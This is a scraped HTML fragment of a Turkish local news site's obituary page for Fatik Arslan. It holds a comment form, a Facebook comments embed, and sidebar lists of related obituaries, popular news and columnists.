  <a class="carousel-control left hs-sdch" href="#anamanset" data-slide="prev">&lsaquo;</a>
  <a class="carousel-control right hs-sdch" href="#anamanset" data-slide="next">&rsaquo;</a>

</div>
 </div>
  
    <div class="clearfix galleries">
    <div class="title">
      <span>İlgili Galeriler</span><hr>
    </div>
    <div class="row-fluid">
            <div class="span3">
        <a href="https://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı">
          <img src="https://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" />
          <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b>
        </a>
      </div>
            <div class="span3">
        <a href="https://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru">
          <img src="https://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" />
          <b>Donatır Mobilya’dan hediye yağmuru</b>
        </a>
      </div>
            <div class="span3">
        <a href="https://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler">
          <img src="https://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" />
          <b>Otomobilde yanarak can verdiler</b>
        </a>
      </div>
          </div>
  </div>
  
  <div id="yorumyap" style="margin:0"></div>
  <div class="clearfix keywords"><div class="title">Anahtar Kelimeler:</div><a href="https://www.elbistaninsesi.com/haberleri/Fatik+Arslan+89+ya%C5%9F%C4%B1nda" title="Fatik Arslan 89 Yaşında haberleri">Fatik Arslan 89 Yaşında</a></div>
      <section>
              <div id="yorumlar">
            <ul class="nav nav-tabs" id="ytab">
              <li class="active"><a href="#yorumpanel" data-toggle="tab">Yorum Gönder <span class="label label-important">0</span></a></li>
               <li><a href="#facebookpanel" class="fbyorum hs-sdch" data-toggle="tab">Facebook Yorumları <span class="label label-inverse"><fb:comments-count href="https://www.elbistaninsesi.com/vefatlar/fatik-arslan-89-yasinda-h72918.html">0</fb:comments-count></span></a></li>            </ul>

            <div class="tab-content">
                              <div class="tab-pane active" id="yorumpanel">
                                    <div class="yorumlar panel">
                    <div id="yorumpaneli" class="row-fluid">
                    <form  name="comment" class="comment_form" id="addcomment">
                        <div class="span1">
                                                        <img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" class="img-rounded"/>                        </div>
                        <div class="span11">
                            <div class="row-fluid">
                                <div class="input-prepend span6">
                                    <span class="add-on">Adınız</span>
                                    <input name="isim"  class="span10 adsoyad" type="text"  id="adsoyad" size="30" maxlength="50"  title="Ad soyad gerekli!" />
                                </div>
                            </div>
                            <textarea name="yorum" maxlength="1000" class="span12" id="comment_field" onkeyup="textKey(this.form)" placeholder="Yorum yazmak için bu alanı kullanabilirsiniz. Yorum yazarken lütfen aşağıda yazılan uyarıları göz önünde bulundurunuz!"></textarea>
                            <div class="span12" style="margin:0;">
                            <div class="answer span5" style="display:none;">Yanıt: <b>@name</b> <a href="javascript:void(0)" class="kaldir">x</a></div>
                            <a href="javascript:void(0)" onclick="javascript:comment_send(72918);return false;" class="btn hs-sdch btn-warning pull-right">Yorum Gönder</a>
                            <div class="karakter span4 pull-right">Kalan Karakter: <input name="character" id="character" disabled size="3" value="1000"></div></div>
                        </div>
                        <input type="hidden" name="hid" value="72918" />
                        <input type="hidden" name="uid" value="0" />
                        <input type="hidden" name="tip" value="haber" />
                        <input type="hidden" name="cevap" value="" class="answer" />
                        <input type="hidden" name="cevap_id" value="0" class="cevap_id" />
                        <input type="hidden" name="token" value="bfde0c061c27805d163c501dc3faf730c793fd0c" />

                    </form>
                    </div>
                    <div class="alert">Yorumunuz onaylanmak üzere yöneticiye iletilmiştir.<a class="close" data-dismiss="alert" href="#">&times;</a></div>
                </div>
                <div class="alert alert-block alert-error fade in" style="display:block;margin-top:15px;">
                    <button type="button" class="close" data-dismiss="alert">×</button>
                    <strong>Dikkat!</strong> Suç teşkil edecek, yasadışı, tehditkar, rahatsız edici, hakaret ve küfür içeren, aşağılayıcı, küçük düşürücü, kaba, müstehcen, ahlaka aykırı, kişilik haklarına zarar verici ya da benzeri niteliklerde içeriklerden doğan her türlü mali, hukuki, cezai, idari sorumluluk içeriği gönderen Üye/Üyeler’e aittir.                </div>
            

            
            
            </div> <!-- .tab-pane -->

                          <div class="tab-pane yorumlar fbpanel" id="facebookpanel">
                <div class="row-fluid">
                  <div id="fb-root"></div>
                  <script>(function(d, s, id) {
                    var js, fjs = d.getElementsByTagName(s)[0];
                    if (d.getElementById(id)) return;
                    js = d.createElement(s); js.id = id;
                    js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1";
                    fjs.parentNode.insertBefore(js, fjs);
                  }(document, 'script', 'facebook-jssdk'));</script>
                  <div class="fb-comments" data-href="https://www.elbistaninsesi.com/vefatlar/fatik-arslan-89-yasinda-h72918.html" data-width="603" data-colorscheme="light" data-numposts="10"></div>
                </div> <!-- #facebookpanel -->
              </div>
            
          </div> <!-- .tab-content -->

        </div> <!-- #yorumlar -->
    </section>
  
          </div>

                <!-- Sağ Blok -->
        <div id="sidebar" class="sidebar span4">
          
          
  
  
    <!-- ILGILI HABERLER  -->
  <div id="ilgiliHaberler-y">
    <div class="ilgiliHaberler-y-t glyphicons white show_big_thumbnails hs-bgc text-uppercase">İlgili Haberler</div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/vefatlar/anma-ozgur-yesilbas-h72916.html"  title="Anma / Özgür Yeşilbaş">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/02/anma_ozgur_yesilbas_h72916_bdd4b.jpg" alt="Anma / Özgür Yeşilbaş" />
        <span>Anma / Özgür Yeşilbaş</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/vefatlar/mikdat-gunes-71-yasinda-h72915.html"  title="Mikdat Güneş 71 yaşında">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/02/mikdat_gunes_71_yasinda_h72915_8c761.jpg" alt="Mikdat Güneş 71 yaşında" />
        <span>Mikdat Güneş 71 yaşında</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/vefatlar/hasan-dogan-88-yasinda-h72903.html"  title="Hasan Doğan 88 yaşında">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/02/hasan_dogan_88_yasinda_h72903_fbfcd.jpeg" alt="Hasan Doğan 88 yaşında" />
        <span>Hasan Doğan 88 yaşında</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/vefatlar/anma-sonmez-dumlupinar-h72891.html"  title="Anma / Sönmez Dumlupınar">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/02/anma_sonmez_dumlupinar_h72891_835af.jpg" alt="Anma / Sönmez Dumlupınar" />
        <span>Anma / Sönmez Dumlupınar</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/vefatlar/yusuf-ayhan-91-yasinda-h72890.html"  title="Yusuf Ayhan 91 Yaşında;">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/02/yusuf_ayhan_91_yasinda_h72890_4fccb.jpeg" alt="Yusuf Ayhan 91 Yaşında;" />
        <span>Yusuf Ayhan 91 Yaşında;</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/vefatlar/haci-altun-82-yasinda-h72889.html"  title="Hacı Altun 82 yaşında,">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/02/haci_altun_82_yasinda_h72889_fd919.jpeg" alt="Hacı Altun 82 yaşında," />
        <span>Hacı Altun 82 yaşında,</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/vefatlar/seniha-daglioglu-yuksel-69-yasinda-h72888.html"  title="Seniha Dağlıoğlu Yüksel  69 yaşında">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/02/seniha_daglioglu_yuksel_69_yasinda_h72888_35752.jpeg" alt="Seniha Dağlıoğlu Yüksel  69 yaşında" />
        <span>Seniha Dağlıoğlu Yüksel  69 yaşında</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/vefatlar/anma-zubeyde-zedeli-h72880.html"  title="Anma / Zübeyde Zedeli">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/02/anma_zubeyde_zedeli_h72880_32893.jpg" alt="Anma / Zübeyde Zedeli" />
        <span>Anma / Zübeyde Zedeli</span>
      </a>
    </div>
      </div>

  
  <!-- EGAZETE -->
  <div class="egazete">
    <div class="header">
      <h5>E-Gazete</h5>
    </div>
    <div class="content">
            <a href="https://www.elbistaninsesi.com/images/sayfalar/14-Şubat-2022.jpg" title="Elbistanın Sesi - 14.02.2022 Manşeti" target="_blank"><img src="https://www.elbistaninsesi.com/images/sayfalar/thumb_14-Şubat-2022.jpg" alt="Elbistanın Sesi - 14.02.2022 Manşeti" /></a>
           </div>
  </div>

  
  <!-- SOSYAL  -->
  <div class="hs-sosyal clearfix">
      <div class="hs-box hs-facebook">
        <div class="top">
          <div class="icon"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div>
          <div class="right">
            <span class="count"><a href="https://facebook.com/elbistaninsesi" class="hs-sdch" target="blank" id="likes"></a></span>
            <span class="text">Beğeni</span>
          </div>
        </div>
        <div class="bottom">
          <a href="https://facebook.com/elbistaninsesi" target="blank" class="hs-sdch" rel="nofollow">Facebook'ta Beğen</a>
        </div>
      </div>
      <div class="hs-box hs-twitter">
        <div class="top">
          <div class="icon"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div>
          <div class="right">
            <span class="count"><a href="https://twitter.com/elbistaninsesi" class="hs-sdch" target="blank" id="followers">100</a></span>
            <span class="text">Takipçi</span>
          </div>
        </div>
        <div class="bottom">
          <a href="https://twitter.com/elbistaninsesi" target="blank" class="hs-sdch" rel="nofollow">Twitter'da Takip Et</a>
        </div>
      </div>

      <div class="hs-box hs-youtube">
          <div class="top">
              <div class="icon"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/youtube.png" alt="Youtube"></div>
          </div>
          <div class="bottom">
              <a href="" target="blank" class="hs-sdch" rel="nofollow">Youtube Abone Ol</a>
          </div>
      </div>

      <div class="hs-box hs-instagram">
          <div class="top">
              <div class="icon"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/instagram.png" alt="instagram"></div>
          </div>
          <div class="bottom">
              <a href="" target="blank" class="hs-sdch" rel="nofollow">Instagram Takip</a>
          </div>
      </div>



  </div>

  

  <!-- ENCOKLAR  -->
  <div class="encoklar">
    <div class="accordion">
    	      	<div class="accordion-group">
        	<div class="accordion-heading hs-bgc">
          		<a class="accordion-toggle hs-sdch" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne">
          			<span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5>
				</a>
        	</div>
        	<div id="collapseOne" class="accordion-body collapse in">
          		<div class="accordion-inner">
            		<ul class="en-list">
              		              			<li class="last en-hidden en-visible"><a href="https://www.elbistaninsesi.com/guncel/elbistanli-is-adami-mersinde-yasamina-son-verdi-h72811.html" title="Elbistanlı iş adamı Mersinde..." class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/02/elbistanli_is_adami_mersinde_yasamina_son_verdi_h72811_4764b.jpg" alt="Elbistanlı iş adamı Mersinde..." ></a><div class="en-right"><a href="https://www.elbistaninsesi.com/guncel/elbistanli-is-adami-mersinde-yasamina-son-verdi-h72811.html" title="" ><span class="en-hit">1.</span> <strong>Elbistanlı iş adamı Mersin’de...</strong> <span class="en-spot en-hidden">Mersin’de, inşaat firması sahibi olan Elbistanlı iş adamının yaşamına...</span></a></div></li>
              		              			<li class="en-hidden"><a href="https://www.elbistaninsesi.com/guncel/esinden-bosanan-vatandas-arabasina-oyle-bir-yazi-yazdi-ki-h72676.html" title="Eşinden boşanan vatandaş arabasına..." class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/01/esinden_bosanan_vatandas_arabasina_oyle_bir_yazi_yazdi_ki_h72676_e5dc6.jpg" alt="Eşinden boşanan vatandaş arabasına..." ></a><div class="en-right"><a href="https://www.elbistaninsesi.com/guncel/esinden-bosanan-vatandas-arabasina-oyle-bir-yazi-yazdi-ki-h72676.html" title="" ><span class="en-hit">2.</span> <strong>Eşinden boşanan vatandaş arabasına...</strong> <span class="en-spot en-hidden">Elbistan’da, eşinden boşanan bir vatandaş, eşinden boşandıktan...</span></a></div></li>
              		              			<li class="en-hidden"><a href="https://www.elbistaninsesi.com/guncel/mobilya-ustasi-cinayete-kurban-gitti-h72613.html" title="Mobilya ustası cinayete kurban gitti" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/01/mobilya_ustasi_cinayete_kurban_gitti_h72613_d2e5d.jpg" alt="Mobilya ustası cinayete kurban gitti" ></a><div class="en-right"><a href="https://www.elbistaninsesi.com/guncel/mobilya-ustasi-cinayete-kurban-gitti-h72613.html" title="" ><span class="en-hit">3.</span> <strong>Mobilya ustası cinayete kurban gitti</strong> <span class="en-spot en-hidden">Elbistan nüfusuna kayıtlı olduğu öğrenilen 36 yaşındaki mobilya...</span></a></div></li>
              		              			<li class="en-hidden"><a href="https://www.elbistaninsesi.com/guncel/turkiyenin-en-soguk-sehri-goksun-oldu-h72697.html" title="Türkiyenin en soğuk şehri Göksun..." class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/01/turkiyenin_en_soguk_sehri_goksun_oldu_h72697_d1fff.jpg" alt="Türkiyenin en soğuk şehri Göksun..." ></a><div class="en-right"><a href="https://www.elbistaninsesi.com/guncel/turkiyenin-en-soguk-sehri-goksun-oldu-h72697.html" title="" ><span class="en-hit">4.</span> <strong>Türkiye’nin en soğuk şehri Göksun...</strong> <span class="en-spot en-hidden">Yazın serin, kışın soğuk havası ve yoğun kar yağışı aldığı...</span></a></div></li>
              		              			<li class="en-hidden"><a href="https://www.elbistaninsesi.com/guncel/mutlucan-seker-pancar-fiyatlarini-acikladi-h72624.html" title="Mutlucan Şeker, pancar fiyatlarını..." class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/01/mutlucan_seker_pancar_fiyatlarini_acikladi_h72624_a52f9.JPG" alt="Mutlucan Şeker, pancar fiyatlarını..." ></a><div class="en-right"><a href="https://www.elbistaninsesi.com/guncel/mutlucan-seker-pancar-fiyatlarini-acikladi-h72624.html" title="" ><span class="en-hit">5.</span> <strong>Mutlucan Şeker, pancar fiyatlarını...</strong> <span class="en-spot en-hidden">Mutlucan Elbistan Şeker Fabrikası’nın 2022/2023 üretim dönemi şeker...</span></a></div></li>
              		            		</ul>
          		</div>
        	</div>
      	</div>
              <div class="accordion-group">
        <div class="accordion-heading hs-bgc">
          <a class="accordion-toggle hs-sdch" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo">
            <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a>
        </div>
        <div id="collapseTwo" class="accordion-body collapse in">
          <div class="accordion-inner">
            <ul class="en-list">
                            <li class="en-hidden en-visible"><a href="https://www.elbistaninsesi.com/vefatlar/cuma-yalcinoz-55-yasinda-h72744.html" title="Cuma Yalçınöz 55 yaşında" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/02/cuma_yalcinoz_55_yasinda_h72744_78af5.jpeg" alt="Cuma Yalçınöz 55 yaşında"></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/cuma-yalcinoz-55-yasinda-h72744.html" title="" ><span class="en-hit">1.</span> <strong>Cuma Yalçınöz 55 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="https://www.elbistaninsesi.com/vefatlar/nusret-ozpolat-h72629.html" title=" Nusret Özpolat" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/01/nusret_ozpolat_h72629_4bdff.jpg" alt=" Nusret Özpolat"></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/nusret-ozpolat-h72629.html" title="" ><span class="en-hit">2.</span> <strong> Nusret Özpolat</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="https://www.elbistaninsesi.com/vefatlar/hamit-ceker-88-yasinda-h72726.html" title="Hamit Çeker 88 Yaşında" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/02/hamit_ceker_88_yasinda_h72726_df9f8.jpg" alt="Hamit Çeker 88 Yaşında"></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/hamit-ceker-88-yasinda-h72726.html" title="" ><span class="en-hit">3.</span> <strong>Hamit Çeker 88 Yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="https://www.elbistaninsesi.com/vefatlar/elif-karalar-74-yasinda-h72735.html" title="Elif Karalar 74 yaşında" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/02/elif_karalar_74_yasinda_h72735_74f5d.jpg" alt="Elif Karalar 74 yaşında"></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/elif-karalar-74-yasinda-h72735.html" title="" ><span class="en-hit">4.</span> <strong>Elif Karalar 74 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="https://www.elbistaninsesi.com/vefatlar/yasar-kantarci-73-yasinda-h72877.html" title="Yaşar Kantarcı 73 yaşında" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/02/yasar_kantarci_73_yasinda_h72877_eacf2.jpeg" alt="Yaşar Kantarcı 73 yaşında"></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/yasar-kantarci-73-yasinda-h72877.html" title="" ><span class="en-hit">5.</span> <strong>Yaşar Kantarcı 73 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                          </ul>
          </div>
        </div>
      </div>
        </div>
  </div>

  <div class="reklam reklam203"><a href="https://www.elbistaninsesi.com/banner.php?id=196" target="_blank" rel="nofollow"><img src="https://www.elbistaninsesi.com/thumb.php?src=https://www.elbistaninsesi.com/images/banner/satılık-kiralık-işyeri.jpg&w=280&h=445&q=80" width="280" height="445" style="width:280px;height: 445px;border:0" alt="banner196" class="img-responsive"/></a></div>
  <!-- YAZARLAR -->
  <div id="syazar" class="hs-yazarlar">
    <div class="header">
      <h5><a href="https://www.elbistaninsesi.com/yazarlar/" title="Yazarlar">Yazarlar</a></h5>
            <a class="control left" href="#" id="syprev"></a>
      <a class="control right" href="#" id="synext"></a>
          </div>
    <div class="content">
      <div class="item">
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/a-karakocun-yayinlanmamis-siirmektubu-makale,6535.html" title="A. Karakoç’un yayınlanmamış şiir/mektubu" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/1.jpg" alt="Arif  Bilgin">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/1/arif-bilgin" title="Arif  Bilgin">Arif  Bilgin</a></h4>
              <a href="https://www.elbistaninsesi.com/a-karakocun-yayinlanmamis-siirmektubu-makale,6535.html" title="A. Karakoç’un yayınlanmamış şiir/mektubu" >A. Karakoç’un yayınlanmamış şiir/mektubu</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/cocuklarda-korku-ve-kaygi-makale,6534.html" title=" ÇOCUKLARDA KORKU VE KAYGI" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/tuğba.jpg" alt="Tuğba Arıkan">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/101/tugba-arikan" title="Tuğba Arıkan">Tuğba Arıkan</a></h4>
              <a href="https://www.elbistaninsesi.com/cocuklarda-korku-ve-kaygi-makale,6534.html" title=" ÇOCUKLARDA KORKU VE KAYGI" > ÇOCUKLARDA KORKU VE KAYGI</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/kiyafetindeki-guzellige-bak-makale,6533.html" title="KI­YA­FETİNDEKİ GÜ­ZELLİĞE BAK!" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/hamdiyuce.jpg" alt="Hamdi YÜCE">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/106/hamdi-yuce" title="Hamdi YÜCE">Hamdi YÜCE</a></h4>
              <a href="https://www.elbistaninsesi.com/kiyafetindeki-guzellige-bak-makale,6533.html" title="KI­YA­FETİNDEKİ GÜ­ZELLİĞE BAK!" >KI­YA­FETİNDEKİ GÜ­ZELLİĞE BAK!</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/kultur-ve-kultur-devrimi-makale,6532.html" title="KÜLTÜR VE KÜLTÜR DEVRİMİ" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/me.jpg" alt="İlhan Akar">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/81/ilhan-akar" title="İlhan Akar">İlhan Akar</a></h4>
              <a href="https://www.elbistaninsesi.com/kultur-ve-kultur-devrimi-makale,6532.html" title="KÜLTÜR VE KÜLTÜR DEVRİMİ" >KÜLTÜR VE KÜLTÜR DEVRİMİ</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/tecrube-ile-sabit-36-makale,6531.html" title="TECRÜBE İLE SABİT -36-" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/mehmet-gozukara_1.jpg" alt="Mehmet Gözükara">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/13/mehmet-gozukara" title="Mehmet Gözükara">Mehmet Gözükara</a></h4>
              <a href="https://www.elbistaninsesi.com/tecrube-ile-sabit-36-makale,6531.html" title="TECRÜBE İLE SABİT -36-" >TECRÜBE İLE SABİT -36-</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/ben-babamin-ogluyum-makale,6530.html" title="BEN BA­BA­MIN OĞ­LU­YUM" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/eyyupceran_1.jpg" alt="Eyyup Ceran">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/105/eyyup-ceran" title="Eyyup Ceran">Eyyup Ceran</a></h4>
              <a href="https://www.elbistaninsesi.com/ben-babamin-ogluyum-makale,6530.html" title="BEN BA­BA­MIN OĞ­LU­YUM" >BEN BA­BA­MIN OĞ­LU­YUM</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/gardas-makale,6529.html" title="GARDAŞ" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Ramazan-Pamuk_910_1.jpg" alt="Ramazan Pamuk">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/23/ramazan-pamuk" title="Ramazan Pamuk">Ramazan Pamuk</a></h4>
              <a href="https://www.elbistaninsesi.com/gardas-makale,6529.html" title="GARDAŞ" >GARDAŞ</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/imar-toplantisi-makale,6528.html" title="İMAR TOP­LAN­TI­SI" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/yazarlar_koYesi.jpg" alt="Aykut YILDIRIM">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/70/aykut-yildirim" title="Aykut YILDIRIM">Aykut YILDIRIM</a></h4>
              <a href="https://www.elbistaninsesi.com/imar-toplantisi-makale,6528.html" title="İMAR TOP­LAN­TI­SI" >İMAR TOP­LAN­TI­SI</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/gara-sehitlerimize-mtem-makale,6527.html" title="GARA ŞEHİTLERİMİZE MÂTEM" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/dr-mustafa-kok_1.jpg" alt="Dr. Mustafa KÖK">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/8/dr-mustafa-kok" title="Dr. Mustafa KÖK">Dr. Mustafa KÖK</a></h4>
              <a href="https://www.elbistaninsesi.com/gara-sehitlerimize-mtem-makale,6527.html" title="GARA ŞEHİTLERİMİZE MÂTEM" >GARA ŞEHİTLERİMİZE MÂTEM</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/ask-ve-sevgi-makale,6526.html" title="AŞK VE SEVGİ" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/yazar_kadın-1.jpg" alt="Nazife YETİŞGEN">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/103/nazife-yetisgen" title="Nazife YETİŞGEN">Nazife YETİŞGEN</a></h4>
              <a href="https://www.elbistaninsesi.com/ask-ve-sevgi-makale,6526.html" title="AŞK VE SEVGİ" >AŞK VE SEVGİ</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/imkanlar-basamagi-makale,6525.html" title=" İMKANLAR BASAMAĞI" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/m-emin-elagoz_1.jpg" alt="M. Emin ELAGÖZ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/7/m-emin-elagoz" title="M. Emin ELAGÖZ">M. Emin ELAGÖZ</a></h4>
              <a href="https://www.elbistaninsesi.com/imkanlar-basamagi-makale,6525.html" title=" İMKANLAR BASAMAĞI" > İMKANLAR BASAMAĞI</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/milli-mucadelemizin-102-yilinda-maras-ve-elbistan-makale,6522.html" title="Milli Mü­ca­de­le­mi­zin 102. Yı­lın­da Maraş Ve El­bis­tan" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/034421b8-4158-4551-83a7-c308f4156fe9.jpg" alt="Orhan SAYDAM">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/89/orhan-saydam" title="Orhan SAYDAM">Orhan SAYDAM</a></h4>
              <a href="https://www.elbistaninsesi.com/milli-mucadelemizin-102-yilinda-maras-ve-elbistan-makale,6522.html" title="Milli Mü­ca­de­le­mi­zin 102. Yı­lın­da Maraş Ve El­bis­tan" >Milli Mü­ca­de­le­mi­zin 102. Yı­lın­da Maraş Ve El­bis­tan</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/neyleyim-makale,6520.html" title="NEY­LEYİM" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Mahir_BaYpYnar.jpg" alt="Mahir Başpınar">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/57/mahir-baspinar" title="Mahir Başpınar">Mahir Başpınar</a></h4>
              <a href="https://www.elbistaninsesi.com/neyleyim-makale,6520.html" title="NEY­LEYİM" >NEY­LEYİM</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/istanbul-makale,6519.html" title="İSTAN­BUL" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Yemliha-Gurlek_688_1.jpg" alt="Yemliha Gürlek">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/31/yemliha-gurlek" title="Yemliha Gürlek">Yemliha Gürlek</a></h4>
